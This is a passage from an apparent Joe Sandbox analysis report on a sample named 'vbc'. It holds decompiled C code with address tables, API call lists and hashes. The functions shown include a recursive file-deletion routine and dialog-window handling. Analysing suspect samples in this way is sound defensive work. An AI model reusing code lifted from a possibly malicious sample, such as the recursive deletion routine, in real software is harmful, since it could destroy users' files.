				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00406045(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8b28 =  *0x7a8b28 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040666E(0x7a3f90, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F89(_t68);
					} else {
						lstrcatW(0x7a3f90, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040666E(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D32(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056D0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8b28 =  *0x7a8b28 + 1;
										} else {
											E004056D0(0xfffffff1, _t68);
											E0040642E(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D7A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x7a3f90 - 0x5c;
					if( *0x7a3f90 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004069A4(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F3D(_t68);
							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056D0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056D0(0xfffffff1, _t68);
							return E0040642E(_t67, _t68, 0);
						}
						L30:
						 *0x7a8b28 =  *0x7a8b28 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                          0x00405d84
                                          0x00405d89
                                          0x00405d92
                                          0x00405d95
                                          0x00405d9d
                                          0x00405da0
                                          0x00405da3
                                          0x00405dab
                                          0x00405dad
                                          0x00405dae
                                          0x00000000
                                          0x00405dae
                                          0x00405db9
                                          0x00405dbc
                                          0x00405dbc
                                          0x00405dbc
                                          0x00405dc0
                                          0x00405dd3
                                          0x00405dda
                                          0x00405ddf
                                          0x00405de3
                                          0x00405df3
                                          0x00405de5
                                          0x00405deb
                                          0x00405deb
                                          0x00405df8
                                          0x00405dfc
                                          0x00405e08
                                          0x00405e0e
                                          0x00405e13
                                          0x00405e19
                                          0x00405e24
                                          0x00405e2a
                                          0x00405e2c
                                          0x00405e2f
                                          0x00405ed9
                                          0x00405ed9
                                          0x00405edd
                                          0x00405edf
                                          0x00405edf
                                          0x00405edf
                                          0x00405edf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405e35
                                          0x00405e35
                                          0x00405e35
                                          0x00405e3d
                                          0x00405e5d
                                          0x00405e65
                                          0x00405e6a
                                          0x00405e71
                                          0x00405e8c
                                          0x00405e91
                                          0x00405e93
                                          0x00405eb7
                                          0x00405e95
                                          0x00405e95
                                          0x00405e98
                                          0x00405eac
                                          0x00405e9a
                                          0x00405e9d
                                          0x00405ea5
                                          0x00405ea5
                                          0x00405e98
                                          0x00405e73
                                          0x00405e79
                                          0x00405e7b
                                          0x00405e81
                                          0x00405e81
                                          0x00405e7b
                                          0x00000000
                                          0x00405e71
                                          0x00405e3f
                                          0x00405e47
                                          0x00000000
                                          0x00000000
                                          0x00405e49
                                          0x00405e51
                                          0x00000000
                                          0x00000000
                                          0x00405e53
                                          0x00405e5b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405ebc
                                          0x00405ec4
                                          0x00405eca
                                          0x00405eca
                                          0x00405ed3
                                          0x00000000
                                          0x00405ed3
                                          0x00405dfe
                                          0x00405e06
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405dc2
                                          0x00405dc2
                                          0x00405dc4
                                          0x00405ee4
                                          0x00405ee6
                                          0x00405ee9
                                          0x00405f3a
                                          0x00405f3a
                                          0x00405f3a
                                          0x00405eeb
                                          0x00405eee
                                          0x00405ef9
                                          0x00405efe
                                          0x00405f00
                                          0x00000000
                                          0x00000000
                                          0x00405f03
                                          0x00405f0f
                                          0x00405f14
                                          0x00405f16
                                          0x00000000
                                          0x00405f31
                                          0x00405f18
                                          0x00405f1b
                                          0x00000000
                                          0x00000000
                                          0x00405f20
                                          0x00000000
                                          0x00405f27
                                          0x00405ef0
                                          0x00405ef0
                                          0x00000000
                                          0x00405ef0
                                          0x00405dca
                                          0x00405dcd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405dcd

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405DA3
                                          • lstrcatW.KERNEL32 ref: 00405DEB
                                          • lstrcatW.KERNEL32 ref: 00405E0E
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E14
                                          • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E24
                                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
                                          • FindClose.KERNELBASE(00000000), ref: 00405ED3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: .$.$\*.*
                                          • API String ID: 2035342205-3749113046
                                          • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                                          • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
                                          • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                                          • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004069A4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004069A4(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4fd8;
			}




                                          0x004069af
                                          0x004069b8
                                          0x00000000
                                          0x004069c5
                                          0x004069bb
                                          0x00000000

                                          APIs
                                          • FindFirstFileW.KERNELBASE(7556D4C4,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004069AF
                                          • FindClose.KERNEL32(00000000), ref: 004069BB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                                          • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
                                          • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                                          • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004040CB Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 146 4040ef-4040f8 142->146 144 4042a2-4042b7 143->144 145 404255-40429d GetDlgItem * 2 call 4045ca SetClassLongW call 40140b 143->145 148 4042f7-4042fc call 404616 144->148 149 4042b9-4042bc 144->149 145->144 150 4040fa-404107 SetWindowPos 146->150 151 40410d-404114 146->151 165 404301-40431c 148->165 155 4042be-4042c9 call 401389 149->155 156 4042ef-4042f1 149->156 150->151 152 404116-404130 ShowWindow 151->152 153 404158-40415e 151->153 158 404231-40423f call 404631 152->158 159 404136-404149 GetWindowLongW 152->159 160 404160-404172 DestroyWindow 153->160 161 404177-40417a 153->161 155->156 181 4042cb-4042ea SendMessageW 155->181 156->148 164 404597 156->164 171 404599-4045a0 158->171 159->158 168 40414f-404152 ShowWindow 159->168 169 404574-40457a 160->169 172 40417c-404188 SetWindowLongW 161->172 173 40418d-404193 161->173 164->171 166 404325-40432b 165->166 167 40431e-404320 call 40140b 165->167 178 404331-40433c 166->178 179 404555-40456e DestroyWindow EndDialog 166->179 167->166 168->153 169->164 177 40457c-404582 169->177 172->171 173->158 180 404199-4041a8 GetDlgItem 173->180 177->164 183 404584-40458d ShowWindow 177->183 178->179 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 178->184 179->169 185 4041c7-4041ca 180->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 180->186 181->171 183->164 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->164 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->158 194 4041e7-4041ed 192->194 195 40421b-40422b SendMessageW 192->195 193->195 198 4041dc-4041de 193->198 199 404204-40420d call 40140b 194->199 200 4041ef-4041f5 call 40140b 194->200 195->158 198->191 199->158 210 40420f-404219 199->210 209 4041fb 200->209 209->191 210->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->165 233 40446a-40446c 222->233 233->165 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->169 238 4044af-4044dc CreateDialogParamW 235->238 236->164 237 404484-40448a 236->237 237->165 239 404490 237->239 238->169 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->164 240->164 245 40453b-404553 ShowWindow call 404616 240->245 245->169
                                          C-Code - Quality: 84%
                                          			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f70 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8aa8 = _t127;
						 *0x7a1f84 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff50 = _t91;
						E004045CA(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88);
						 *0x7a7a6c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f70 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8ac0;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404616(0x40b);
						while(1) {
							_t36 =  *0x7a1f70;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x7a8ac4;
							if(_t38 ==  *0x7a8ac4) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a6c - _t136;
							if( *0x7a7a6c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045CA(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8b2c - _t136;
							_v28 = _t48;
							if( *0x7a8b2c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045EC(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff50, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8b2c - _t136;
							if( *0x7a8b2c == _t136) {
								_push( *0x7a1f84);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff50);
							}
							E004045FF();
							E0040666E(0x7a1f88, E004040AC());
							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f88);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a78);
									 *0x7a0f60 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x7a7a78 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045CA(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a7a6c - _t136;
									if( *0x7a7a6c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a78, 8);
									E00404616(0x405);
									goto L60;
								}
								__eflags =  *0x7a8b2c - _t136;
								if( *0x7a8b2c != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8b20 - _t136;
								if( *0x7a8b20 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a78); // executed
						 *0x7a8aa8 = _t136;
						EndDialog(_t127,  *0x7a0758); // executed
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
						__eflags =  *0x7a7a6c;
						return 0 |  *0x7a7a6c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8b2c - _t136;
											if( *0x7a8b2c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0758 = 1;
												L23:
												_push(0x78);
												L24:
												E004045A3();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0758 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a78);
						 *0x7a7a78 = _t122;
						L60:
						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x7a3f88 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404631(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                          0x004040d6
                                          0x004040dd
                                          0x00404244
                                          0x00404248
                                          0x0040424c
                                          0x0040424e
                                          0x00404253
                                          0x0040425e
                                          0x00404269
                                          0x0040426e
                                          0x00404270
                                          0x00404272
                                          0x00404275
                                          0x0040427a
                                          0x00404288
                                          0x00404295
                                          0x0040429c
                                          0x0040429c
                                          0x0040429d
                                          0x0040429d
                                          0x004042a2
                                          0x004042a8
                                          0x004042af
                                          0x004042b5
                                          0x004042b7
                                          0x004042f7
                                          0x004042fc
                                          0x00404301
                                          0x00404301
                                          0x00404306
                                          0x0040430f
                                          0x00404311
                                          0x00404316
                                          0x0040431c
                                          0x00404320
                                          0x00404320
                                          0x00404325
                                          0x0040432b
                                          0x00000000
                                          0x00000000
                                          0x00404336
                                          0x0040433c
                                          0x00000000
                                          0x00000000
                                          0x00404345
                                          0x0040434d
                                          0x00404352
                                          0x00404355
                                          0x0040435b
                                          0x00404360
                                          0x00404363
                                          0x00404369
                                          0x0040436e
                                          0x00404371
                                          0x00404377
                                          0x0040437f
                                          0x00404385
                                          0x0040438b
                                          0x0040438f
                                          0x00404396
                                          0x00404396
                                          0x00404396
                                          0x004043a0
                                          0x004043b2
                                          0x004043be
                                          0x004043c3
                                          0x004043cd
                                          0x004043d3
                                          0x004043d5
                                          0x004043da
                                          0x004043d7
                                          0x004043d7
                                          0x004043d7
                                          0x004043ea
                                          0x00404402
                                          0x00404404
                                          0x0040440a
                                          0x0040441f
                                          0x0040440c
                                          0x00404415
                                          0x00404417
                                          0x00404417
                                          0x00404425
                                          0x00404436
                                          0x0040444c
                                          0x00404453
                                          0x00404459
                                          0x0040445d
                                          0x00404462
                                          0x00404464
                                          0x00000000
                                          0x0040446a
                                          0x0040446a
                                          0x0040446c
                                          0x00000000
                                          0x00000000
                                          0x00404472
                                          0x00404476
                                          0x0040449b
                                          0x004044a1
                                          0x004044a7
                                          0x004044a9
                                          0x00000000
                                          0x00000000
                                          0x004044cf
                                          0x004044d5
                                          0x004044d7
                                          0x004044dc
                                          0x00000000
                                          0x00000000
                                          0x004044e2
                                          0x004044e5
                                          0x004044e8
                                          0x004044ff
                                          0x0040450b
                                          0x00404524
                                          0x0040452a
                                          0x0040452e
                                          0x00404533
                                          0x00404539
                                          0x00000000
                                          0x00000000
                                          0x00404543
                                          0x0040454e
                                          0x00000000
                                          0x0040454e
                                          0x00404478
                                          0x0040447e
                                          0x00000000
                                          0x00000000
                                          0x00404484
                                          0x0040448a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404490
                                          0x00404464
                                          0x0040455b
                                          0x00404567
                                          0x0040456e
                                          0x00000000
                                          0x004042b9
                                          0x004042b9
                                          0x004042bc
                                          0x004042ef
                                          0x004042ef
                                          0x004042f1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004042f1
                                          0x004042be
                                          0x004042c2
                                          0x004042c7
                                          0x004042c9
                                          0x00000000
                                          0x00000000
                                          0x004042d9
                                          0x004042e1
                                          0x00000000
                                          0x004042e7
                                          0x004040ef
                                          0x004040ef
                                          0x004040f3
                                          0x004040f8
                                          0x00404107
                                          0x00404107
                                          0x0040410d
                                          0x00404114
                                          0x00404158
                                          0x0040415e
                                          0x00404177
                                          0x0040417a
                                          0x0040418d
                                          0x00404193
                                          0x00000000
                                          0x00000000
                                          0x00404199
                                          0x004041a4
                                          0x004041a6
                                          0x004041a8
                                          0x004041c7
                                          0x004041c7
                                          0x004041ca
                                          0x004041cf
                                          0x004041d2
                                          0x004041e2
                                          0x004041e3
                                          0x004041e5
                                          0x0040421b
                                          0x0040422b
                                          0x00000000
                                          0x0040422b
                                          0x004041e7
                                          0x004041ed
                                          0x00404206
                                          0x0040420b
                                          0x0040420d
                                          0x00000000
                                          0x00000000
                                          0x0040420f
                                          0x004041fb
                                          0x004041fb
                                          0x004041fd
                                          0x004041fd
                                          0x00000000
                                          0x004041fd
                                          0x004041f0
                                          0x004041f5
                                          0x00000000
                                          0x004041f5
                                          0x004041d4
                                          0x004041da
                                          0x00000000
                                          0x00000000
                                          0x004041dc
                                          0x00000000
                                          0x004041dc
                                          0x004041cc
                                          0x00000000
                                          0x004041cc
                                          0x004041b2
                                          0x004041b9
                                          0x004041bf
                                          0x004041c1
                                          0x00404597
                                          0x00000000
                                          0x00404597
                                          0x00000000
                                          0x004041c1
                                          0x0040417f
                                          0x00000000
                                          0x00404187
                                          0x00404166
                                          0x0040416c
                                          0x00404574
                                          0x0040457a
                                          0x00404587
                                          0x0040458d
                                          0x0040458d
                                          0x00000000
                                          0x00404116
                                          0x0040411b
                                          0x00404127
                                          0x00404130
                                          0x00404231
                                          0x00000000
                                          0x0040414f
                                          0x00404152
                                          0x00000000
                                          0x00404152
                                          0x00404130
                                          0x00404114

                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
                                          • ShowWindow.USER32(?), ref: 00404127
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404139
                                          • ShowWindow.USER32(?,00000004), ref: 00404152
                                          • DestroyWindow.USER32 ref: 00404166
                                          • SetWindowLongW.USER32 ref: 0040417F
                                          • GetDlgItem.USER32(?,?), ref: 0040419E
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
                                          • IsWindowEnabled.USER32(00000000), ref: 004041B9
                                          • GetDlgItem.USER32(?,00000001), ref: 00404264
                                          • GetDlgItem.USER32(?,00000002), ref: 0040426E
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404288
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
                                          • GetDlgItem.USER32(?,00000003), ref: 0040437F
                                          • ShowWindow.USER32(00000000,?), ref: 004043A0
                                          • EnableWindow.USER32(?,?), ref: 004043B2
                                          • EnableWindow.USER32(?,?), ref: 004043CD
                                          • GetSystemMenu.USER32 ref: 004043E3
                                          • EnableMenuItem.USER32 ref: 004043EA
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
                                          • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
                                          • SetWindowTextW.USER32 ref: 00404453
                                          • ShowWindow.USER32(?,0000000A), ref: 00404587
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
